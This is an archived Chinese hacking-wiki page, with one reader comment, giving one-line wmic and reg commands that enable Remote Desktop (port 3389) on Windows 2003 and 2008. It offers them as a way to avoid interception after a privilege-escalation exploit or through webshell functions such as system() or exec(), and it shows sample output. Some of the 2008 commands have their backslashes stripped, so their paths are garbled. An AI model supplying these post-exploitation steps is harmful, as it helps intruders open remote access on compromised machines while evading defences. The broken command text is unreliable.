用户工具

站点工具


习科旧站:一句命令开3389

网上流传了很多开3389的exe小工具,还有读写注册表的bat批处理,有的是操作注册表,有的是操作各种组件
这里提供一个不会被拦截,而且可以使用的开3389的cmd一句话

Win 2003:

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

不管你是溢出提权工具,还是 wscript.shell 或者是 system() , exec() 等等,都可以用这个来尝试开启3389
亲测比批处理好用多了

测试回显

正在安装 WMIC,请稍候。执行 (\\JOINR410-1\ROOT\CIMV2:Win32_TerminalServiceSetting.ServerName="JOINR410-1")->SetAllowTSConnections()
方法执行成功。
输出参数:
instance of __PARAMETERS
{
        ReturnValue = 0;

};

Win 2008

wmic /namespace:\rootcimv2terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\rootcimv2terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

评论

曲云杰, 2017/09/04 15:24

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal“ “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

cmd执行开3389不用重启! 这个也好用!

你需要登录发表评论。
习科旧站/一句命令开3389.txt · 最后更改: 2020/05/16 19:19 (外部编辑)

页面工具